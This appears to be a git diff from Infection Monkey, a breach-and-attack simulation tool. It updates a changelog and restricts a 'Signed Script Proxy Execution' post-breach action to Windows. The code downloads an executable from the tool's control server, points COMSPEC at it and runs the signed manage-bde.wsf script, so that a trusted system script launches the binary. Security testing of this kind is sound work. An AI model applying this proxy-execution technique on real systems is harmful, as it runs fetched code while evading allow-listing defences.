diff --git a/CHANGELOG.md b/CHANGELOG.md
index 84fd4e114..16c53a610 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -21,6 +21,8 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545
 - Windows "run as a user" powershell command for manual agent runs. #1570
+- A bug in the "Signed Script Proxy Execution" PBA that downloaded the exe on Linux
+  systems as well. #1557
 
 ### Security
 
diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
index 0431dd83d..414f95e3e 100644
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
@@ -1,21 +1,28 @@
 import os
 
 from infection_monkey.control import ControlClient
+from infection_monkey.utils.environment import is_windows_os
 
 TEMP_COMSPEC = os.path.join(os.getcwd(), "T1216_random_executable.exe")
 
 
 def get_windows_commands_to_proxy_execution_using_signed_script():
+    signed_script = ""
+
+    if is_windows_os():
+        _download_random_executable()
+        windir_path = os.environ["WINDIR"]
+        signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")
+
+    return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"]
+
+
+def _download_random_executable():
     download = ControlClient.get_T1216_pba_file()
     with open(TEMP_COMSPEC, "wb") as random_exe_obj:
         random_exe_obj.write(download.content)
         random_exe_obj.flush()
 
-    windir_path = os.environ["WINDIR"]
-    signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")
-
-    return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"]
-
 
 def get_windows_commands_to_reset_comspec(original_comspec):
     return f"set comspec={original_comspec}"